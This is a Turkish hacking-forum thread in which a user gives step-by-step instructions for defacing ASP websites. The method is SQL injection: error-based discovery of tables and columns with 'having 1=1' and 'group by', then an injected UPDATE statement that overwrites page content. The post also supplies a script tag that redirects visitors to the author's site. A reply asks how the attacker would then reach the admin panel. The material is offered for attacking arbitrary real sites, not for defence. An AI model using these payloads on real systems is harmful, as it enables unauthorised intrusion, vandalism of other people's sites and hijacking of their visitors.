asp site hack

ProgenTR

Üye
20 Ağu 2007
72
2
Selam Herkese

Şimdi hazırlayacağım dökümanda asp siteleri hacklemeyi göstereceğim video hazırlıcaktım ama pcde sorun var :S

şimdi ilk olarak kendimize bir site seçelim

www.siteadı.com/news.asp?id=1

örneğin sitemiz bu olsun bunun sql injection açığı olup olmadığını adresin sonunda 'a şeklinde yazıyoruz

yani şu şekilde

www.siteadı.com/news.asp?id=1'a

Unclosed quotation mark after the character string 'a

bu uyarıyı alırsa siteye update edebiliriz

şimdi tablo ve kolon adlarını öğrenelim

www.siteadı.com/news.asp?id=1 having 1=1 yaparak tablo ve kolon adını öğreniriz

örneğin tablo adı

ew_news.ID

tablo adı:ew_news
kolon adı :ID ama ilk kolonda update olmaya bilir bizde diğer kolonu bulalım
şimdi ise sitenin sonuna

www.siteadı.com/news.asp?id=1 group by ew_news.ID

ve diğer kolon adını öğreniriz.

ew_news.title

tablo adı:ew_news
kolon adı:title

şimdi update yapalım

www.siteadı.com/news.asp?id=1 update tablo_adı set kolon_adı='yazılacak yazı';--

www.siteadı.com/news.asp?id=1 update ew_news set title='PROGENTR';--

isterseniz yönlendirebilirsiniz

koduda vereyim
<scpript>********="http://progentr.freetzi.com"</script>

buyrun

yapamayan arkadaşlar için msn adresim İletişim adresi vermek yasaktır | EmpoRe

hacker değil lamer değil hacker adayı ProgenTR tarafından hazırlanmıştır alıntı değildir alın teridir.


Selametle Kalın..





Herşey THT için ...
 
Moderatör tarafında düzenlendi:

ProgenTR

Üye
20 Ağu 2007
72
2
<scpript>********="http://progentr.freetzi.com"</script> şu kodun bir kısmı çıkmadı sanırım sansür :D:D
 

Charpce

Katılımcı Üye
23 Eki 2011
354
0
ovv açığı buldum admin paneline nasıl erişeceksin ? hadi adam panel adresini site.com/sdfsdkjfsdjfhsfjhsdjhjh23j23.asp yaptı ve o sayfayı masaüstüne kaydetti sadece kendisi biliyor :)))
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.